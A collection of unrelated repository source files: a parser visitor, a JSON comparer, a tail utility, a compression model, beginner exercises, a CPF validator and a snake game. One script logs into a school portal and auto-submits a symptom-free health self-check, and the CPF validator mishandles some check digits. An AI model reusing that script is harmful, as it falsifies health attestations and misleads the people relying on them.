return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#expression.
def visitExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unit.
def visitUnit(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitSingleOrPairOperator.
def visitUnitSingleOrPairOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#unitOperator.
def visitUnitOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#primary.
def visitPrimary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#string.
def visitString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#halfString.
def visitHalfString(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#number.
def visitNumber(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#integer.
def visitInteger(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#boolean.
def visitBoolean(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by UnitXParser#none.
def visitNone(self, ctx):
return self.visitChildren(ctx)
``` |
{
"source": "0-errors-0-warnings/mongodb-compare",
"score": 3
} |
#### File: 0-errors-0-warnings/mongodb-compare/compare.py
```python
import json
import os
def load_json_file(file_name):
with open(file_name, 'r') as f:
return json.load(f)
def to_key(key1, key2):
return f'{key1}/{key2}'
def compare_items(item1, item2, key_path):
#print(item1)
#print(item2)
for key, value in item1.items():
if key not in item2.keys():
print(f'key "{to_key(key_path, key)}" missing from target')
else:
if type(value) is dict:
compare_items(value, item2[key], f'{to_key(key_path, key)}')
elif value != item2[key]:
print(f'value mismatch for key "{to_key(key_path, key)}". src: {value}, tgt: {item2[key]}')
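# Illustrative check (hypothetical inline dicts, not the data/*.json files loaded below):
# compare_items({'a': 1, 'b': {'c': 2}}, {'a': 1, 'b': {}}, '.')
# prints: key "./b/c" missing from target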
item1 = load_json_file('data/1.json')
item2 = load_json_file('data/2.json')
print('src: 1.json, tgt: 2.json')
compare_items(item1, item2, '.')
print('\n\n')
print('src: 2.json, tgt: 1.json')
compare_items(item2, item1, '.')
``` |
{
"source": "0eu/tail-assignment",
"score": 3
} |
#### File: tail-assignment/tail/core.py
```python
import os
from typing import Generator, TextIO
BUFFER_SIZE = 1
LINE_BREAK_CHAR = "\n"
def read_last_lines(fh: TextIO, lines: int = 10) -> Generator[str, None, None]:
fh.seek(0, os.SEEK_END)
found_lines = 0
for offset in range(fh.tell() - 1, -1, -1):
fh.seek(offset)
if fh.read(BUFFER_SIZE) == LINE_BREAK_CHAR:
found_lines += 1
if found_lines > lines:
break
if found_lines <= lines:
fh.seek(0)
while (line := fh.readline()) and line and found_lines > 0:
yield line
found_lines -= 1
def follow_lines(fh: TextIO) -> Generator[str, None, None]:
while True:
yield from fh.readlines()
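# Illustrative usage sketch (assumes a local "app.log" file exists):
# with open("app.log") as fh:
#     for line in read_last_lines(fh, lines=5):
#         print(line, end="")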
```
#### File: tail-assignment/utils/generate_logs.py
```python
import hashlib
from time import sleep
from random import randint
from datetime import datetime
LOGS_FILENAME = 'tests/test_data/logs_stream.log'
DELIMITER = '\t'
LINE_BREAKER = '\n'
def write(log_filename: str, logs):
with open(log_filename, 'a') as file_handler:
for log in logs:
file_handler.write(log)
def generate_logs(count: int):
assert count > 0, "Number of log entries should be more than 0"
return (generate_row() for _ in range(count))
def generate_row():
return DELIMITER.join((get_today_date(), generate_random_hash(), LINE_BREAKER))
def get_today_date():
return datetime.today().strftime("%d/%m/%y %H:%M:%S")
def generate_random_hash() -> str:
return hashlib.md5(str(randint(1, 1000)).encode()).hexdigest()
def main():
while True:
sleep_duration = randint(1, 5)
logs_count = randint(20, 25)
print(f'Writing {logs_count} logs to {LOGS_FILENAME}')
write(LOGS_FILENAME, generate_logs(logs_count))
sleep(sleep_duration)
if __name__ == '__main__':
main()
``` |
{
"source": "0ev/TempCheck",
"score": 3
} |
#### File: TempCheck/app/test.py
```python
import requests
from bs4 import BeautifulSoup
global USER_AGENT
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0"
def initialize(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'DNT': '1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://ksa.hs.kr/Account/Login', headers=headers)
def get_login_token(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Referer': 'https://www.ksa.hs.kr/',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://www.ksa.hs.kr/Account/Login', headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"]
return result
def make_data(login_token,id,password):
return f'''-----------------------------<PASSWORD>1506
Content-Disposition: form-data; name="__RequestVerificationToken"
{login_token}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="UserId"
{str(id)}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="Password"
{str(password)}
-----------------------------325333128821718686562724141506
Content-Disposition: form-data; name="UserType"
학생
-----------------------------325333128821718686562724141506--
'''
def login(s,login_token,id,password):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'multipart/form-data; boundary=---------------------------325333128821718686562724141506',
'Origin': 'https://ksa.hs.kr',
'DNT': '1',
'Connection': 'keep-alive',
'Referer': 'https://ksa.hs.kr/Account/Login',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.post('https://ksa.hs.kr/Account/Login', data = make_data(login_token,id,password).encode("utf-8"), headers=headers)
def get_check_token(s):
headers = {
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Referer': 'https://www.ksa.hs.kr/',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.get('https://www.ksa.hs.kr/SelfHealthCheck/Index/200', headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"]
return result
def check(s,check_token,okay):
okay_data = {
'__RequestVerificationToken': check_token,
'SelfCheckItemDatas[0].Order': '1',
'SelfCheckItemDatas[1].Order': '2',
'SelfCheckItemDatas[2].Order': '3',
'survey_q1': 'False',
'SelfCheckItemDatas[0].CheckResultValues[0]': '0',
'survey_q2': 'False',
'SelfCheckItemDatas[1].CheckResultValues[0]': '0',
'survey_q3': 'False',
'SelfCheckItemDatas[2].CheckResultValues[0]': '0'
}
not_okay_data = {
'__RequestVerificationToken': check_token,
'SelfCheckItemDatas[0].Order': '1',
'SelfCheckItemDatas[1].Order': '2',
'SelfCheckItemDatas[2].Order': '3',
'survey_q1': 'True',
'SelfCheckItemDatas[0].CheckResultValues[0]': '1',
'survey_q2': 'True',
'SelfCheckItemDatas[1].CheckResultValues[0]': '1',
'survey_q3': 'True',
'SelfCheckItemDatas[2].CheckResultValues[0]': '1'
}
if okay:
data = okay_data
elif not okay:
data = not_okay_data
headers = {
'User-Agent': USER_AGENT,
'Accept': '*/*',
'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'https://www.ksa.hs.kr',
'Connection': 'keep-alive',
'Referer': 'https://www.ksa.hs.kr/SelfHealthCheck/Index/200',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache',
}
response = s.post('https://www.ksa.hs.kr/SelfHealthCheck/index/200', headers=headers, data=data)
return response.json()
def run(id,password):
with requests.Session() as s:
login_token = "<PASSWORD>"
login(s,login_token,id,password)
check_token = get_check_token(s)
result = check(s, check_token, True)
return result
``` |
{
"source": "0F0F/CompressAI",
"score": 2
} |
#### File: CompressAI/examples/model.py
```python
import argparse
import struct
import sys
import time
import math
import random
import shutil
import sys
from pathlib import Path
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from PIL import Image
from torchvision.transforms import ToPILImage, ToTensor
from torch.utils.data import DataLoader
from torchvision import transforms
import compressai
from compressai.datasets import ImageFolder
from compressai.layers import GDN
from compressai.models import CompressionModel
from compressai.models.utils import conv, deconv, update_registered_buffers
from compressai.entropy_models import EntropyBottleneck, GaussianConditional
from compressai.transforms import RGB2YCbCr, YCbCr2RGB# tensor -> tensor
from compressai.models import ScaleHyperprior
metric_ids = {
"mse": 0,
}
# From Balle's tensorflow compression examples
SCALES_MIN = 0.11
SCALES_MAX = 256
SCALES_LEVELS = 64
def get_scale_table(
min=SCALES_MIN, max=SCALES_MAX, levels=SCALES_LEVELS
): # pylint: disable=W0622
return torch.exp(torch.linspace(math.log(min), math.log(max), levels))
class ScaleHyperprior_YUV(CompressionModel):
r"""Scale Hyperprior model from <NAME>, <NAME>, <NAME>, <NAME>,
<NAME>: `"Variational Image Compression with a Scale Hyperprior"
<https://arxiv.org/abs/1802.01436>`_ Int. Conf. on Learning Representations
(ICLR), 2018.
Args:
N (int): Number of channels
M (int): Number of channels in the expansion layers (last layer of the
encoder and last layer of the hyperprior decoder)
"""
def __init__(self, N, M, **kwargs):
super().__init__(entropy_bottleneck_channels=N, **kwargs)
self.rgb2yuv = RGB2YCbCr()
self.yuv2rgb = YCbCr2RGB()
_N = N // 2
_M = M // 2
# LUMA
self.g_a_luma = nn.Sequential(
conv(1, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _M),
)
self.g_s_luma = nn.Sequential(
deconv(_M, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, 1),
)
# CHROMA
self.g_a_chroma = nn.Sequential(
conv(2, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _N),
GDN(_N),
conv(_N, _M),
)
self.g_s_chroma = nn.Sequential(
deconv(_M, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, _N),
GDN(_N, inverse=True),
deconv(_N, 2),
)
# HYPERPRIOR -> concat luma and chroma
self.h_a = nn.Sequential(
conv(M, N, stride=1, kernel_size=3),
nn.ReLU(inplace=True),
conv(N, N),
nn.ReLU(inplace=True),
conv(N, N),
)
self.h_s = nn.Sequential(
deconv(N, N),
nn.ReLU(inplace=True),
deconv(N, N),
nn.ReLU(inplace=True),
conv(N, M, stride=1, kernel_size=3),
nn.ReLU(inplace=True),
)
self.gaussian_conditional = GaussianConditional(None)
self.N = int(N)
self.M = int(M)
def forward(self, x):
        x_yuv = self.rgb2yuv(x) # shape: [1, 3, w, h]; keep the batch dim so chunk(3, 1) splits channels, matching compress()
x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h]
x_chroma = torch.cat((x_u, x_v), dim=1) # uv -> [1, 2, w, h]
y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16]
y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16]
y = torch.cat((y_luma, y_chroma), dim=1) # [1, M, w/16, h/16]
z = self.h_a(torch.abs(y))
z_hat, z_likelihoods = self.entropy_bottleneck(z)
scales_hat = self.h_s(z_hat)
y_hat, y_likelihoods = self.gaussian_conditional(y, scales_hat) # [1, M, w/16, h/16]
y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16]
y_hat_luma = torch.cat((y_hat_luma1, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16]
y_hat_chroma = torch.cat((y_hat_u, y_hat_v), dim=1) # [1, M/2, w/16, h/16]
x_hat_luma = self.g_s_luma(y_hat_luma)
x_hat_chroma = self.g_s_chroma(y_hat_chroma)
x_hat_yuv = torch.cat((x_hat_luma, x_hat_chroma), dim=1)
x_hat = self.yuv2rgb(x_hat_yuv)
return {
"x_hat": x_hat,
"likelihoods": {"y": y_likelihoods, "z": z_likelihoods},
}
def load_state_dict(self, state_dict):
# Dynamically update the entropy bottleneck buffers related to the CDFs
update_registered_buffers(
self.entropy_bottleneck,
"entropy_bottleneck",
["_quantized_cdf", "_offset", "_cdf_length"],
state_dict,
)
update_registered_buffers(
self.gaussian_conditional,
"gaussian_conditional",
["_quantized_cdf", "_offset", "_cdf_length", "scale_table"],
state_dict,
)
super().load_state_dict(state_dict)
@classmethod
def from_state_dict(cls, state_dict):
"""Return a new model instance from `state_dict`."""
N = state_dict["g_a_luma.0.weight"].size(0) * 2
M = state_dict["g_a_luma.6.weight"].size(0) * 2
net = cls(N, M)
net.load_state_dict(state_dict)
return net
def update(self, scale_table=None, force=False):
if scale_table is None:
scale_table = get_scale_table()
self.gaussian_conditional.update_scale_table(scale_table, force=force)
super().update(force=force)
def compress(self, x):
x_yuv = self.rgb2yuv(x) # shape: [1, 3, w, h]
x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h]
x_chroma = torch.cat((x_u, x_v), dim=1) # uv -> [1, 2, w, h]
y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16]
y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16]
y = torch.cat((y_luma, y_chroma), dim=1) # [1, M, w/16, h/16]
z = self.h_a(torch.abs(y))
z_strings = self.entropy_bottleneck.compress(z)
z_hat = self.entropy_bottleneck.decompress(z_strings, z.size()[-2:])
scales_hat = self.h_s(z_hat)
indexes = self.gaussian_conditional.build_indexes(scales_hat)
y_strings = self.gaussian_conditional.compress(y, indexes)
return {"strings": [y_strings, z_strings], "shape": z.size()[-2:]}
def decompress(self, strings, shape):
assert isinstance(strings, list) and len(strings) == 2
z_hat = self.entropy_bottleneck.decompress(strings[1], shape)
scales_hat = self.h_s(z_hat)
indexes = self.gaussian_conditional.build_indexes(scales_hat)
y_hat = self.gaussian_conditional.decompress(strings[0], indexes)
y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16]
y_hat_luma = torch.cat((y_hat_luma1, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16]
y_hat_chroma = torch.cat((y_hat_u, y_hat_v), dim=1) # [1, M/2, w/16, h/16]
x_hat_luma = self.g_s_luma(y_hat_luma)
x_hat_chroma = self.g_s_chroma(y_hat_chroma)
        x_hat_yuv = torch.cat((x_hat_luma, x_hat_chroma), dim=1)
        x_hat = self.yuv2rgb(x_hat_yuv)
return {"x_hat": x_hat}
def inverse_dict(d):
# We assume dict values are unique...
    assert len(d.values()) == len(set(d.values()))
return {v: k for k, v in d.items()}
def filesize(filepath: str) -> int:
if not Path(filepath).is_file():
raise ValueError(f'Invalid file "{filepath}".')
return Path(filepath).stat().st_size
def load_image(filepath: str) -> Image.Image:
return Image.open(filepath).convert("RGB")
def img2torch(img: Image.Image) -> torch.Tensor:
return ToTensor()(img).unsqueeze(0)
def torch2img(x: torch.Tensor) -> Image.Image:
return ToPILImage()(x.clamp_(0, 1).squeeze())
def write_uints(fd, values, fmt=">{:d}I"):
fd.write(struct.pack(fmt.format(len(values)), *values))
def write_uchars(fd, values, fmt=">{:d}B"):
fd.write(struct.pack(fmt.format(len(values)), *values))
def read_uints(fd, n, fmt=">{:d}I"):
sz = struct.calcsize("I")
return struct.unpack(fmt.format(n), fd.read(n * sz))
def read_uchars(fd, n, fmt=">{:d}B"):
sz = struct.calcsize("B")
return struct.unpack(fmt.format(n), fd.read(n * sz))
def write_bytes(fd, values, fmt=">{:d}s"):
if len(values) == 0:
return
fd.write(struct.pack(fmt.format(len(values)), values))
def read_bytes(fd, n, fmt=">{:d}s"):
sz = struct.calcsize("s")
return struct.unpack(fmt.format(n), fd.read(n * sz))[0]
def get_header(model_name, metric, quality):
"""Format header information:
- 1 byte for model id
- 4 bits for metric
- 4 bits for quality param
"""
metric = 0
code = (metric << 4) | (quality - 1 & 0x0F)
return 0, code
#return model_ids[model_name], code
def parse_header(header):
"""Read header information from 2 bytes:
- 1 byte for model id
- 4 bits for metric
- 4 bits for quality param
"""
model_id, code = header
quality = (code & 0x0F) + 1
metric = code >> 4
return (
"YUV",
inverse_dict(metric_ids)[metric],
quality,
)
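# Worked example (illustrative): quality=3 with metric "mse" (id 0) gives
# code = (0 << 4) | ((3 - 1) & 0x0F) = 0x02, so parse_header((0, 0x02)) == ("YUV", "mse", 3).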
def pad(x, p=2 ** 6):
h, w = x.size(2), x.size(3)
H = (h + p - 1) // p * p
W = (w + p - 1) // p * p
padding_left = (W - w) // 2
padding_right = W - w - padding_left
padding_top = (H - h) // 2
padding_bottom = H - h - padding_top
return F.pad(
x,
(padding_left, padding_right, padding_top, padding_bottom),
mode="constant",
value=0,
)
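# Illustrative: with p=64 a 1x3x28x28 input becomes 1x3x64x64, the original
# content centred with 18 padded pixels on every side.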
def crop(x, size):
H, W = x.size(2), x.size(3)
h, w = size
padding_left = (W - w) // 2
padding_right = W - w - padding_left
padding_top = (H - h) // 2
padding_bottom = H - h - padding_top
return F.pad(
x,
(-padding_left, -padding_right, -padding_top, -padding_bottom),
mode="constant",
value=0,
)
def _encode(image, metric, quality, coder, output):
compressai.set_entropy_coder(coder)
#def _encode(image, quality, output, metric="mse"):
enc_start = time.time()
img = load_image(image)
start = time.time()
checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality)
state_dict = torch.load(checkpoint_path)["state_dict"]
net = ScaleHyperprior_YUV(192, 320)
net.load_state_dict(state_dict)
net = net.eval()
net.update()
load_time = time.time() - start
x = img2torch(img)
h, w = x.size(2), x.size(3)
p = 64 # maximum 6 strides of 2
x = pad(x, p)
with torch.no_grad():
out = net.compress(x)
shape = out["shape"]
header = get_header("YUV", metric, quality)
with Path(output).open("wb") as f:
write_uchars(f, header)
# write original image size
write_uints(f, (h, w))
# write shape and number of encoded latents
write_uints(f, (shape[0], shape[1], len(out["strings"])))
for s in out["strings"]:
write_uints(f, (len(s[0]),))
write_bytes(f, s[0])
enc_time = time.time() - enc_start
size = filesize(output)
bpp = float(size) * 8 / (img.size[0] * img.size[1])
print(
f"{bpp:.3f} bpp |"
f" Encoded in {enc_time:.2f}s (model loading: {load_time:.2f}s)"
)
def _decode(inputpath, coder, show, output=None):
compressai.set_entropy_coder(coder)
#def _decode(inputpath, show, output=None):
dec_start = time.time()
with Path(inputpath).open("rb") as f:
model, metric, quality = parse_header(read_uchars(f, 2))
original_size = read_uints(f, 2)
shape = read_uints(f, 2)
strings = []
n_strings = read_uints(f, 1)[0]
for _ in range(n_strings):
s = read_bytes(f, read_uints(f, 1)[0])
strings.append([s])
print(f"Model: {model:s}, metric: {metric:s}, quality: {quality:d}")
start = time.time()
checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality)
state_dict = torch.load(checkpoint_path)["state_dict"]
net = ScaleHyperprior_YUV(192, 320)
net.load_state_dict(state_dict)
net = net.eval()
net.update()
load_time = time.time() - start
with torch.no_grad():
out = net.decompress(strings, shape)
x_hat = crop(out["x_hat"], original_size)
img = torch2img(x_hat)
dec_time = time.time() - dec_start
print(f"Decoded in {dec_time:.2f}s (model loading: {load_time:.2f}s)")
if show:
show_image(img)
if output is not None:
img.save(output)
def encode(argv):
parser = argparse.ArgumentParser(description="Encode image to bit-stream")
parser.add_argument("image", type=str)
parser.add_argument(
"-m",
"--metric",
choices=["mse"],
default="mse",
help="metric trained against (default: %(default)s",
)
parser.add_argument(
"-q",
"--quality",
choices=list(range(1, 4)),
type=int,
default=3,
help="Quality setting (default: %(default)s)",
)
parser.add_argument(
"-c",
"--coder",
choices=compressai.available_entropy_coders(),
default=compressai.available_entropy_coders()[0],
help="Entropy coder (default: %(default)s)",
)
parser.add_argument("-o", "--output", help="Output path")
args = parser.parse_args(argv)
if not args.output:
args.output = Path(Path(args.image).resolve().name).with_suffix(".bin")
_encode(args.image, args.metric, args.quality, args.coder, args.output)
def decode(argv):
parser = argparse.ArgumentParser(description="Decode bit-stream to imager")
parser.add_argument("input", type=str)
parser.add_argument(
"-c",
"--coder",
choices=compressai.available_entropy_coders(),
default=compressai.available_entropy_coders()[0],
help="Entropy coder (default: %(default)s)",
)
parser.add_argument("--show", action="store_true")
parser.add_argument("-o", "--output", help="Output path")
args = parser.parse_args(argv)
_decode(args.input, args.coder, args.show, args.output)
def parse_args(argv):
parser = argparse.ArgumentParser(description="")
parser.add_argument("command", choices=["encode", "decode"])
args = parser.parse_args(argv)
return args
def main(argv):
args = parse_args(argv[1:2])
argv = argv[2:]
torch.set_num_threads(1) # just to be sure
if args.command == "encode":
encode(argv)
elif args.command == "decode":
decode(argv)
if __name__ == "__main__":
main(sys.argv)
``` |
{
"source": "0Fernando0/CursoPython",
"score": 4
} |
#### File: PARTE_3/EX022/index.py
```python
def escreva(esc):
a = '~'
while len(a) != len(esc):
a += '~'
print(a)
print(esc)
print(a)
escreva('Fernando')
```
#### File: PARTE_3/EX023/index.py
```python
for c in range(1,11,1):
print(f'{c}',end=' ')
print('FIM')
for c in range(10,-1,-2):
print(f'{c}',end=' ')
print('FIM')
print('agora é sua vez de personalizar a contagem!')
us = int(input('inicio: '))
us2 = int(input('fim: '))
us3 = int(input('intervalo: '))
def contador(us,us2,us3):
if us > us2 and us3 == 0:
for c in range(us,us2-1,-1):
print(f'{c}',end=' ')
print('FIM')
else:
if us3 == 0:
for c in range(us,us2+1,1):
print(f'{c}',end=' ')
print('FIM')
elif us > us2:
for c in range(us,us2-1,-us3):
print(f'{c}',end=' ')
print('FIM')
else:
for c in range(us,us2+1,us3):
print(f'{c}',end=' ')
print('FIM')
contador(us,us2,us3)
```
#### File: PARTE_3/EX026/index.py
```python
from datetime import date
def voto(n):
from datetime import time
idade = date.today().year - n
if idade >= 16 and idade < 18 or idade > 60:
return print(f'com {idade} anos: VOTO OPCIONAL!')
elif idade >= 18 and idade <= 60:
return print(f'com {idade} anos: VOTO OBRIGATORIO!')
else:
return print(f'com {idade} anos: VOTO NEGADO!')
voto(int(input('Em que ano você nasceu? ')))
```
#### File: Portifolio/validador_cpf/back_end.py
```python
def validar_cpf(cpf):
    numero_cpf = cpf[:-2] # CPF without its last 2 digits (the check digits)
    soma = soma_2 = 0 # accumulators for the two weighted sums below
    # first loop: recompute the first check digit from numero_cpf
    for p,numero in enumerate(range(10,1,-1)): # enumerate over a range that starts at 10 and goes down by 1 until 2
        soma += int(numero_cpf[p])*numero # digit at position p of numero_cpf times its weight (10, 9, 8...)
    res_1 = 11 - (soma % 11) # first check-digit calculation
    numero_cpf += str(res_1) # append the result above to numero_cpf as a string
    for c,valor in enumerate(range(11,1,-1)): # second loop, same as the first one but starting at 11
        soma_2 += int(numero_cpf[c]) * valor # same as the first sum, now including the first check digit
    res_2 = 11 - (soma_2 % 11) # same calculation as res_1, for the second check digit
    numero_cpf += str(res_2) # append res_2 to numero_cpf as a string
    # check whether the rebuilt numero_cpf equals the CPF passed to the function
    print('CPF VALIDO') if numero_cpf == cpf else print('CPF INVALIDO')
return
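# Illustrative usage (expects the full 11-digit CPF as a plain string of digits):
# validar_cpf('52998224725')  # prints 'CPF VALIDO' for this commonly cited sample CPF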
``` |
{
"source": "0Franky/snAIke",
"score": 4
} |
#### File: 0Franky/snAIke/map.py
```python
import traceback
import math
import random
import numpy as np
from snake import *
class Map:
"""Map class"""
def __init__(self, snake):
self.structure = MAP # matrix of 0 and 1 representing the map
self.snake = snake # snake evolving in the map
self.food = [random.randint(8, 12), random.randint(8, 12)] # food (list of 2 coordinates)
def update(self):
"""
Checks for collision between snake's head and walls or food
Takes the right action in case of collision
"""
snake_head_x, snake_head_y = self.snake.head
snake_pos = self.structure[snake_head_y][snake_head_x]
# print("snake_head_x POST")
# print(snake_head_x)
if [snake_head_x, snake_head_y] == self.food: # if snake's head is on food
self.snake.grow() # snake grows and new food is created
self.add_food(random.randint(0, SPRITE_NUMBER - 1),
random.randint(0, SPRITE_NUMBER - 1))
elif snake_pos == WALL: # if snake's head is on wall, snek is ded
self.snake.alive = False
def add_food(self, block_x, block_y):
"""
Adds food on (block_x, block_y) position
"""
self.food = [block_x, block_y]
try:
            if self.structure[block_y][block_x] == 0: # checks if food will spawn in a free space (no wall, wall bad); structure is indexed [y][x] as elsewhere in this class
for i in self.snake.body: # checks if food will spawn where the snake is
if i == [block_x, block_y]:
print('Food spawned in snek, respawning...')
self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1))
else:
print('Food spawned in wall, respawning...')
self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1))
except Exception:
traceback.print_exc()
pygame.quit()
def render(self, window):
"""
Renders the map (background, walls and food) on the game window and calls render() of snake
Very very very unoptimized since render does not affect the genetic algorithm
:param window: surface window
"""
wall = pygame.image.load(IMAGE_WALL).convert() # loading images
food = pygame.image.load(IMAGE_FOOD).convert_alpha()
window.fill([0,0,0]) # painting background
num_line = 0
for line in self.structure: # running through the map structure
num_case = 0
for sprite in line:
x = num_case * SPRITE_SIZE
y = num_line * SPRITE_SIZE
if sprite == 1: # displaying wall
window.blit(wall, (x, y))
if self.food == [num_case, num_line]: # displaying food
window.blit(food, (x, y))
num_case += 1
num_line += 1
self.snake.render(window) # snake will be rendered on above the map
def scan(self):
"""
Scans the snake's environment into the 'scan' variable (list of lists) and gives it to snake's vision
Notes:
- 7 first inputs are for walls, 7 next for food, 7 last for itself (its body)
- Food is seen across all the map, walls and body are seen in range of 10 blocks max
- This method is long and I do not factorise much for performance issues,
the structure is easily understandable anyway
:return: nothing but gives vision to the snake
"""
def scan_wall(direction_x, direction_y, direction_range):
"""
Looks for a wall in the direction given in parameters for 10 steps max
I decided to use inner methods for a compromise between performance and factorisation
:param direction_x: direction in x axis, can be 1, 0 or -1 for "right", "stay" and "left" respectively
:param direction_y: direction in y axis, can be 1, 0 or -1 for "down", "stay" and "up" respectively
:param direction_range: maximum range to scan
:return: number with 0 value if nothing or 1/distance to wall if wall's detected
"""
res = 0
for i in range(1, 10): # looking up to 10 blocks max
step_x = head_x + i * direction_x # coordinates of next block to check
step_y = head_y + i * direction_y
if i < direction_range:
if structure[step_y][step_x] == WALL: # if wall is detected in current block
res = 1 / distance((head_x, head_y), (step_x, step_y)) # returns 1/distance to the block
return res
def scan_self(direction_x, direction_y, direction_range):
"""
Looks for a snake's body block in the direction given in parameters for 10 steps max
:params see "scan_wall", same params
:return: number with 0 value if nothing or 1/distance to body if a body block is detected
"""
res = 0
for i in range(1, 10):
step_x = head_x + i * direction_x
step_y = head_y + i * direction_y
if i < direction_range:
if [step_x, step_y] in snake_body:
res = max(res, 1 / distance((head_x, head_y), (step_x, step_y)))
return res
def scan_food(direction_x, direction_y, direction_range):
"""
Looks for food in the direction given in parameters until range is reached
:params see "scan_wall", same params
:return: number with 0 value if nothing or 1/distance to body if a body block is detected
"""
res = 0
for i in range(1, direction_range):
if food_x == (head_x + i * direction_x) and food_y == (head_y + i * direction_y):
res = 1
return res
scan = [[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]] # default value
structure = self.structure
snake_body = self.snake.body # making local variables for readability and performance
head_x = self.snake.head[0]
head_y = self.snake.head[1]
food_x = self.food[0]
food_y = self.food[1]
forward_x = self.snake.direction[0] # calculating each coordinate for each 7 directions
forward_y = self.snake.direction[1] # since the snake sees in FIRST PERSON
right_x = -forward_y
right_y = forward_x
left_x = forward_y # for example, if snake's looking in [1,0] direction (down)
left_y = -forward_x # its left is [1,0] (right for us because we look from above)
forward_right_x = forward_x + right_x
forward_right_y = forward_y + right_y
forward_left_x = forward_x + left_x
forward_left_y = forward_y + left_y # see snake.py class for better explanations
backward_right_x = -forward_left_x
backward_right_y = -forward_left_y
backward_left_x = -forward_right_x
backward_left_y = -forward_right_y
forward_range = (20 - (forward_x * head_x + forward_y * head_y) - 1) % 19 + 1 # computing max range
backward_range = 21 - forward_range # for each direction
right_range = (20 - (right_x * head_x + right_y * head_y) - 1) % 19 + 1
left_range = 21 - right_range
forward_right_range = min(forward_range, right_range) # values are hard encoded
forward_left_range = min(forward_range, left_range) # since I'm not planning on making it modifiable
backward_right_range = min(backward_range, right_range)
backward_left_range = min(backward_range, left_range)
scan[0][0] = scan_wall(forward_x, forward_y, forward_range) # scanning walls in all directions
scan[1][0] = scan_wall(right_x, right_y, right_range)
scan[2][0] = scan_wall(left_x, left_y, left_range)
scan[3][0] = scan_wall(forward_right_x, forward_right_y, forward_right_range)
scan[4][0] = scan_wall(forward_left_x, forward_left_y, forward_left_range)
scan[5][0] = scan_wall(backward_right_x, backward_right_y, backward_right_range)
